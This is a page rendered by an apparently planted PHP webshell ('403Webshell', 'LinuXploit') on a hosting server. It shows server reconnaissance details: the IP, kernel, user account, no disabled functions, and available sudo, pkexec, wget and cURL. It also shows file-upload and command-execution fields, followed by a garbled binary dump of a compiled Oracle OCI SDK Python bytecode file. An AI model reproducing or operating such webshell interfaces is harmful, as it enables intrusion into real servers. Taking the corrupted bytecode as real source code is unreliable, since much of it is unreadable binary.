403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.108
Web Server : Apache
System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /usr/lib/python3.9/site-packages/oci/database/models/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/lib/python3.9/site-packages/oci/database/models/__pycache__/db_node.cpython-39.pyc
a

���f/z�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@s�eZdZdZdZdZdZdZdZdZ	dZ
d	Zd
ZdZ
dZd
d�Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejd d��Zed!d"��Zejd#d"��Zed$d%��Zejd&d%��Zed'd(��Zejd)d(��Zed*d+��Zejd,d+��Zed-d.��Zejd/d.��Zed0d1��Zejd2d1��Zed3d4��Zejd5d4��Zed6d7��Zejd8d7��Zed9d:��Z e jd;d:��Z ed<d=��Z!e!jd>d=��Z!ed?d@��Z"e"jdAd@��Z"edBdC��Z#e#jdDdC��Z#edEdF��Z$e$jdGdF��Z$edHdI��Z%e%jdJdI��Z%edKdL��Z&e&jdMdL��Z&edNdO��Z'e'jdPdO��Z'edQdR��Z(e(jdSdR��Z(edTdU��Z)e)jdVdU��Z)edWdX��Z*e*jdYdX��Z*dZd[�Z+d\d]�Z,d^d_�Z-d`S)a�DbNodez
    DbNode model.
    �PROVISIONING�	AVAILABLE�UPDATING�STOPPING�STOPPED�STARTING�TERMINATING�
TERMINATED�FAILED�VMDB_REBOOT_MIGRATION�EXADBXS_REBOOT_MIGRATIONcKsdddddddddddddddddddddddddd�|_ddd	d
ddd
ddddddddddddddddddd�|_d |_d |_d |_d |_d |_d |_d |_d |_	d |_
d |_d |_d |_
d |_d |_d |_d |_d |_d |_d |_d |_d |_d |_d |_d |_d |_d S)!ak
        Initializes a new DbNode object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param id:
            The value to assign to the id property of this DbNode.
        :type id: str

        :param db_system_id:
            The value to assign to the db_system_id property of this DbNode.
        :type db_system_id: str

        :param vnic_id:
            The value to assign to the vnic_id property of this DbNode.
        :type vnic_id: str

        :param backup_vnic_id:
            The value to assign to the backup_vnic_id property of this DbNode.
        :type backup_vnic_id: str

        :param host_ip_id:
            The value to assign to the host_ip_id property of this DbNode.
        :type host_ip_id: str

        :param backup_ip_id:
            The value to assign to the backup_ip_id property of this DbNode.
        :type backup_ip_id: str

        :param vnic2_id:
            The value to assign to the vnic2_id property of this DbNode.
        :type vnic2_id: str

        :param backup_vnic2_id:
            The value to assign to the backup_vnic2_id property of this DbNode.
        :type backup_vnic2_id: str

        :param lifecycle_state:
            The value to assign to the lifecycle_state property of this DbNode.
            Allowed values for this property are: "PROVISIONING", "AVAILABLE", "UPDATING", "STOPPING", "STOPPED", "STARTING", "TERMINATING", "TERMINATED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type lifecycle_state: str

        :param hostname:
            The value to assign to the hostname property of this DbNode.
        :type hostname: str

        :param fault_domain:
            The value to assign to the fault_domain property of this DbNode.
        :type fault_domain: str

        :param time_created:
            The value to assign to the time_created property of this DbNode.
        :type time_created: datetime

        :param software_storage_size_in_gb:
            The value to assign to the software_storage_size_in_gb property of this DbNode.
        :type software_storage_size_in_gb: int

        :param maintenance_type:
            The value to assign to the maintenance_type property of this DbNode.
            Allowed values for this property are: "VMDB_REBOOT_MIGRATION", "EXADBXS_REBOOT_MIGRATION", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type maintenance_type: str

        :param time_maintenance_window_start:
            The value to assign to the time_maintenance_window_start property of this DbNode.
        :type time_maintenance_window_start: datetime

        :param time_maintenance_window_end:
            The value to assign to the time_maintenance_window_end property of this DbNode.
        :type time_maintenance_window_end: datetime

        :param additional_details:
            The value to assign to the additional_details property of this DbNode.
        :type additional_details: str

        :param freeform_tags:
            The value to assign to the freeform_tags property of this DbNode.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this DbNode.
        :type defined_tags: dict(str, dict(str, object))

        :param lifecycle_details:
            The value to assign to the lifecycle_details property of this DbNode.
        :type lifecycle_details: str

        :param cpu_core_count:
            The value to assign to the cpu_core_count property of this DbNode.
        :type cpu_core_count: int

        :param memory_size_in_gbs:
            The value to assign to the memory_size_in_gbs property of this DbNode.
        :type memory_size_in_gbs: int

        :param db_node_storage_size_in_gbs:
            The value to assign to the db_node_storage_size_in_gbs property of this DbNode.
        :type db_node_storage_size_in_gbs: int

        :param total_cpu_core_count:
            The value to assign to the total_cpu_core_count property of this DbNode.
        :type total_cpu_core_count: int

        :param db_server_id:
            The value to assign to the db_server_id property of this DbNode.
        :type db_server_id: str

        �strZdatetime�intzdict(str, str)zdict(str, dict(str, object)))�id�db_system_id�vnic_id�backup_vnic_id�
host_ip_id�backup_ip_id�vnic2_id�backup_vnic2_id�lifecycle_state�hostname�fault_domain�time_created�software_storage_size_in_gb�maintenance_type�time_maintenance_window_start�time_maintenance_window_end�additional_details�
freeform_tags�defined_tags�lifecycle_details�cpu_core_count�memory_size_in_gbs�db_node_storage_size_in_gbs�total_cpu_core_count�db_server_idrZ
dbSystemIdZvnicIdZbackupVnicIdZhostIpIdZ
backupIpIdZvnic2IdZ
backupVnic2IdZlifecycleStaterZfaultDomainZtimeCreatedZsoftwareStorageSizeInGBZmaintenanceTypeZtimeMaintenanceWindowStartZtimeMaintenanceWindowEndZadditionalDetailsZfreeformTagsZdefinedTagsZlifecycleDetailsZcpuCoreCountZmemorySizeInGBsZdbNodeStorageSizeInGBsZtotalCpuCoreCountZ
dbServerIdN)Z
swagger_typesZ
attribute_map�_id�
_db_system_id�_vnic_id�_backup_vnic_id�_host_ip_id�
_backup_ip_id�	_vnic2_id�_backup_vnic2_id�_lifecycle_state�	_hostname�
_fault_domain�
_time_created�_software_storage_size_in_gb�_maintenance_type�_time_maintenance_window_start�_time_maintenance_window_end�_additional_details�_freeform_tags�
_defined_tags�_lifecycle_details�_cpu_core_count�_memory_size_in_gbs�_db_node_storage_size_in_gbs�_total_cpu_core_count�
_db_server_id)�self�kwargs�rH�?/usr/lib/python3.9/site-packages/oci/database/models/db_node.py�__init__>s�o��zDbNode.__init__cCs|jS)z�
        **[Required]** Gets the id of this DbNode.
        The `OCID`__ of the database node.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The id of this DbNode.
        :rtype: str
        �r-�rFrHrHrIr�sz	DbNode.idcCs
||_dS)z�
        Sets the id of this DbNode.
        The `OCID`__ of the database node.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param id: The id of this DbNode.
        :type: str
        NrK)rFrrHrHrIrscCs|jS)a
        **[Required]** Gets the db_system_id of this DbNode.
        The `OCID`__ of the DB system.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The db_system_id of this DbNode.
        :rtype: str
        �r.rLrHrHrIrszDbNode.db_system_idcCs
||_dS)a
        Sets the db_system_id of this DbNode.
        The `OCID`__ of the DB system.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param db_system_id: The db_system_id of this DbNode.
        :type: str
        NrM)rFrrHrHrIr(scCs|jS)z�
        **[Required]** Gets the vnic_id of this DbNode.
        The `OCID`__ of the VNIC.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The vnic_id of this DbNode.
        :rtype: str
        �r/rLrHrHrIr6szDbNode.vnic_idcCs
||_dS)z�
        Sets the vnic_id of this DbNode.
        The `OCID`__ of the VNIC.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param vnic_id: The vnic_id of this DbNode.
        :type: str
        NrN)rFrrHrHrIrDscCs|jS)z�
        Gets the backup_vnic_id of this DbNode.
        The `OCID`__ of the backup VNIC.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The backup_vnic_id of this DbNode.
        :rtype: str
        �r0rLrHrHrIrRszDbNode.backup_vnic_idcCs
||_dS)a
        Sets the backup_vnic_id of this DbNode.
        The `OCID`__ of the backup VNIC.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param backup_vnic_id: The backup_vnic_id of this DbNode.
        :type: str
        NrO)rFrrHrHrIr`scCs|jS)a

        Gets the host_ip_id of this DbNode.
        The `OCID`__ of the host IP address associated with the database node. Use this OCID with either the
        :func:`get_private_ip` or the :func:`get_public_ip_by_private_ip_id` API to get the IP address
        needed to make a database connection.

        **Note:** Applies only to Exadata Cloud Service.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The host_ip_id of this DbNode.
        :rtype: str
        �r1rLrHrHrIrnszDbNode.host_ip_idcCs
||_dS)a
        Sets the host_ip_id of this DbNode.
        The `OCID`__ of the host IP address associated with the database node. Use this OCID with either the
        :func:`get_private_ip` or the :func:`get_public_ip_by_private_ip_id` API to get the IP address
        needed to make a database connection.

        **Note:** Applies only to Exadata Cloud Service.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param host_ip_id: The host_ip_id of this DbNode.
        :type: str
        NrP)rFrrHrHrIr�scCs|jS)a
        Gets the backup_ip_id of this DbNode.
        The `OCID`__ of the backup IP address associated with the database node. Use this OCID with either the
        :func:`get_private_ip` or the :func:`get_public_ip_by_private_ip_id` API to get the IP address
        needed to make a database connection.

        **Note:** Applies only to Exadata Cloud Service.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The backup_ip_id of this DbNode.
        :rtype: str
        �r2rLrHrHrIr�szDbNode.backup_ip_idcCs
||_dS)a
        Sets the backup_ip_id of this DbNode.
        The `OCID`__ of the backup IP address associated with the database node. Use this OCID with either the
        :func:`get_private_ip` or the :func:`get_public_ip_by_private_ip_id` API to get the IP address
        needed to make a database connection.

        **Note:** Applies only to Exadata Cloud Service.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param backup_ip_id: The backup_ip_id of this DbNode.
        :type: str
        NrQ)rFrrHrHrIr�scCs|jS)a-
        Gets the vnic2_id of this DbNode.
        The `OCID`__ of the second VNIC.

        **Note:** Applies only to Exadata Cloud Service.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The vnic2_id of this DbNode.
        :rtype: str
        �r3rLrHrHrIr�szDbNode.vnic2_idcCs
||_dS)a4
        Sets the vnic2_id of this DbNode.
        The `OCID`__ of the second VNIC.

        **Note:** Applies only to Exadata Cloud Service.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param vnic2_id: The vnic2_id of this DbNode.
        :type: str
        NrR)rFrrHrHrIr�scCs|jS)aB
        Gets the backup_vnic2_id of this DbNode.
        The `OCID`__ of the second backup VNIC.

        **Note:** Applies only to Exadata Cloud Service.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The backup_vnic2_id of this DbNode.
        :rtype: str
        �r4rLrHrHrIr�szDbNode.backup_vnic2_idcCs
||_dS)aP
        Sets the backup_vnic2_id of this DbNode.
        The `OCID`__ of the second backup VNIC.

        **Note:** Applies only to Exadata Cloud Service.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param backup_vnic2_id: The backup_vnic2_id of this DbNode.
        :type: str
        NrS)rFrrHrHrIr�scCs|jS)a�
        **[Required]** Gets the lifecycle_state of this DbNode.
        The current state of the database node.

        Allowed values for this property are: "PROVISIONING", "AVAILABLE", "UPDATING", "STOPPING", "STOPPED", "STARTING", "TERMINATING", "TERMINATED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The lifecycle_state of this DbNode.
        :rtype: str
        )r5rLrHrHrIr�s
zDbNode.lifecycle_statecCs gd�}t||�sd}||_dS)z�
        Sets the lifecycle_state of this DbNode.
        The current state of the database node.


        :param lifecycle_state: The lifecycle_state of this DbNode.
        :type: str
        )	rrr	r
rrr
rr�UNKNOWN_ENUM_VALUEN)rr5)rFr�allowed_valuesrHrHrIrs

cCs|jS)z�
        Gets the hostname of this DbNode.
        The host name for the database node.


        :return: The hostname of this DbNode.
        :rtype: str
        �r6rLrHrHrIrs
zDbNode.hostnamecCs
||_dS)z�
        Sets the hostname of this DbNode.
        The host name for the database node.


        :param hostname: The hostname of this DbNode.
        :type: str
        NrV)rFrrHrHrIr s
cCs|jS)z�
        Gets the fault_domain of this DbNode.
        The name of the Fault Domain the instance is contained in.


        :return: The fault_domain of this DbNode.
        :rtype: str
        �r7rLrHrHrIr,s
zDbNode.fault_domaincCs
||_dS)z�
        Sets the fault_domain of this DbNode.
        The name of the Fault Domain the instance is contained in.


        :param fault_domain: The fault_domain of this DbNode.
        :type: str
        NrW)rFrrHrHrIr8s
cCs|jS)z�
        **[Required]** Gets the time_created of this DbNode.
        The date and time that the database node was created.


        :return: The time_created of this DbNode.
        :rtype: datetime
        �r8rLrHrHrIrDs
zDbNode.time_createdcCs
||_dS)z�
        Sets the time_created of this DbNode.
        The date and time that the database node was created.


        :param time_created: The time_created of this DbNode.
        :type: datetime
        NrX)rFrrHrHrIrPs
cCs|jS)a,
        Gets the software_storage_size_in_gb of this DbNode.
        The size (in GB) of the block storage volume allocation for the DB system. This attribute applies only for virtual machine DB systems.


        :return: The software_storage_size_in_gb of this DbNode.
        :rtype: int
        �r9rLrHrHrIr \s
z"DbNode.software_storage_size_in_gbcCs
||_dS)aF
        Sets the software_storage_size_in_gb of this DbNode.
        The size (in GB) of the block storage volume allocation for the DB system. This attribute applies only for virtual machine DB systems.


        :param software_storage_size_in_gb: The software_storage_size_in_gb of this DbNode.
        :type: int
        NrY)rFr rHrHrIr hs
cCs|jS)a�
        Gets the maintenance_type of this DbNode.
        The type of database node maintenance.

        Allowed values for this property are: "VMDB_REBOOT_MIGRATION", "EXADBXS_REBOOT_MIGRATION", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The maintenance_type of this DbNode.
        :rtype: str
        )r:rLrHrHrIr!ts
zDbNode.maintenance_typecCs ddg}t||�sd}||_dS)z�
        Sets the maintenance_type of this DbNode.
        The type of database node maintenance.


        :param maintenance_type: The maintenance_type of this DbNode.
        :type: str
        rrrTN)rr:)rFr!rUrHrHrIr!�s

cCs|jS)z�
        Gets the time_maintenance_window_start of this DbNode.
        Start date and time of maintenance window.


        :return: The time_maintenance_window_start of this DbNode.
        :rtype: datetime
        �r;rLrHrHrIr"�s
z$DbNode.time_maintenance_window_startcCs
||_dS)z�
        Sets the time_maintenance_window_start of this DbNode.
        Start date and time of maintenance window.


        :param time_maintenance_window_start: The time_maintenance_window_start of this DbNode.
        :type: datetime
        NrZ)rFr"rHrHrIr"�s
cCs|jS)z�
        Gets the time_maintenance_window_end of this DbNode.
        End date and time of maintenance window.


        :return: The time_maintenance_window_end of this DbNode.
        :rtype: datetime
        �r<rLrHrHrIr#�s
z"DbNode.time_maintenance_window_endcCs
||_dS)z�
        Sets the time_maintenance_window_end of this DbNode.
        End date and time of maintenance window.


        :param time_maintenance_window_end: The time_maintenance_window_end of this DbNode.
        :type: datetime
        Nr[)rFr#rHrHrIr#�s
cCs|jS)z�
        Gets the additional_details of this DbNode.
        Additional information about the planned maintenance.


        :return: The additional_details of this DbNode.
        :rtype: str
        �r=rLrHrHrIr$�s
zDbNode.additional_detailscCs
||_dS)z�
        Sets the additional_details of this DbNode.
        Additional information about the planned maintenance.


        :param additional_details: The additional_details of this DbNode.
        :type: str
        Nr\)rFr$rHrHrIr$�s
cCs|jS)a�
        Gets the freeform_tags of this DbNode.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
        For more information, see `Resource Tags`__.

        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The freeform_tags of this DbNode.
        :rtype: dict(str, str)
        �r>rLrHrHrIr%�szDbNode.freeform_tagscCs
||_dS)a�
        Sets the freeform_tags of this DbNode.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
        For more information, see `Resource Tags`__.

        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param freeform_tags: The freeform_tags of this DbNode.
        :type: dict(str, str)
        Nr])rFr%rHrHrIr%�scCs|jS)a{
        Gets the defined_tags of this DbNode.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        For more information, see `Resource Tags`__.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The defined_tags of this DbNode.
        :rtype: dict(str, dict(str, object))
        �r?rLrHrHrIr&�s
zDbNode.defined_tagscCs
||_dS)a�
        Sets the defined_tags of this DbNode.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        For more information, see `Resource Tags`__.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param defined_tags: The defined_tags of this DbNode.
        :type: dict(str, dict(str, object))
        Nr^)rFr&rHrHrIr&s
cCs|jS)z�
        Gets the lifecycle_details of this DbNode.
        Information about the current lifecycle state.


        :return: The lifecycle_details of this DbNode.
        :rtype: str
        �r@rLrHrHrIr's
zDbNode.lifecycle_detailscCs
||_dS)z�
        Sets the lifecycle_details of this DbNode.
        Information about the current lifecycle state.


        :param lifecycle_details: The lifecycle_details of this DbNode.
        :type: str
        Nr_)rFr'rHrHrIr'&s
cCs|jS)z�
        Gets the cpu_core_count of this DbNode.
        The number of CPU cores enabled on the Db node.


        :return: The cpu_core_count of this DbNode.
        :rtype: int
        �rArLrHrHrIr(2s
zDbNode.cpu_core_countcCs
||_dS)z�
        Sets the cpu_core_count of this DbNode.
        The number of CPU cores enabled on the Db node.


        :param cpu_core_count: The cpu_core_count of this DbNode.
        :type: int
        Nr`)rFr(rHrHrIr(>s
cCs|jS)z�
        Gets the memory_size_in_gbs of this DbNode.
        The allocated memory in GBs on the Db node.


        :return: The memory_size_in_gbs of this DbNode.
        :rtype: int
        �rBrLrHrHrIr)Js
zDbNode.memory_size_in_gbscCs
||_dS)z�
        Sets the memory_size_in_gbs of this DbNode.
        The allocated memory in GBs on the Db node.


        :param memory_size_in_gbs: The memory_size_in_gbs of this DbNode.
        :type: int
        Nra)rFr)rHrHrIr)Vs
cCs|jS)z�
        Gets the db_node_storage_size_in_gbs of this DbNode.
        The allocated local node storage in GBs on the Db node.


        :return: The db_node_storage_size_in_gbs of this DbNode.
        :rtype: int
        �rCrLrHrHrIr*bs
z"DbNode.db_node_storage_size_in_gbscCs
||_dS)z�
        Sets the db_node_storage_size_in_gbs of this DbNode.
        The allocated local node storage in GBs on the Db node.


        :param db_node_storage_size_in_gbs: The db_node_storage_size_in_gbs of this DbNode.
        :type: int
        Nrb)rFr*rHrHrIr*ns
cCs|jS)z�
        Gets the total_cpu_core_count of this DbNode.
        The total number of CPU cores reserved on the Db node.


        :return: The total_cpu_core_count of this DbNode.
        :rtype: int
        �rDrLrHrHrIr+zs
zDbNode.total_cpu_core_countcCs
||_dS)z�
        Sets the total_cpu_core_count of this DbNode.
        The total number of CPU cores reserved on the Db node.


        :param total_cpu_core_count: The total_cpu_core_count of this DbNode.
        :type: int
        Nrc)rFr+rHrHrIr+�s
cCs|jS)a!
        Gets the db_server_id of this DbNode.
        The `OCID`__ of the Exacc Db server associated with the database node.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The db_server_id of this DbNode.
        :rtype: str
        �rErLrHrHrIr,�szDbNode.db_server_idcCs
||_dS)a,
        Sets the db_server_id of this DbNode.
        The `OCID`__ of the Exacc Db server associated with the database node.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param db_server_id: The db_server_id of this DbNode.
        :type: str
        Nrd)rFr,rHrHrIr,�scCst|�S�N)rrLrHrHrI�__repr__�szDbNode.__repr__cCs|durdS|j|jkS)NF)�__dict__�rF�otherrHrHrI�__eq__�sz
DbNode.__eq__cCs
||kSrerHrhrHrHrI�__ne__�sz
DbNode.__ne__N).�__name__�
__module__�__qualname__�__doc__ZLIFECYCLE_STATE_PROVISIONINGZLIFECYCLE_STATE_AVAILABLEZLIFECYCLE_STATE_UPDATINGZLIFECYCLE_STATE_STOPPINGZLIFECYCLE_STATE_STOPPEDZLIFECYCLE_STATE_STARTINGZLIFECYCLE_STATE_TERMINATINGZLIFECYCLE_STATE_TERMINATEDZLIFECYCLE_STATE_FAILEDZ&MAINTENANCE_TYPE_VMDB_REBOOT_MIGRATIONZ)MAINTENANCE_TYPE_EXADBXS_REBOOT_MIGRATIONrJ�propertyr�setterrrrrrrrrrrrr r!r"r#r$r%r&r'r(r)r*r+r,rfrjrkrHrHrHrIrs�A



























































rN)Zoci.utilrrrZoci.decoratorsr�objectrrHrHrHrI�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit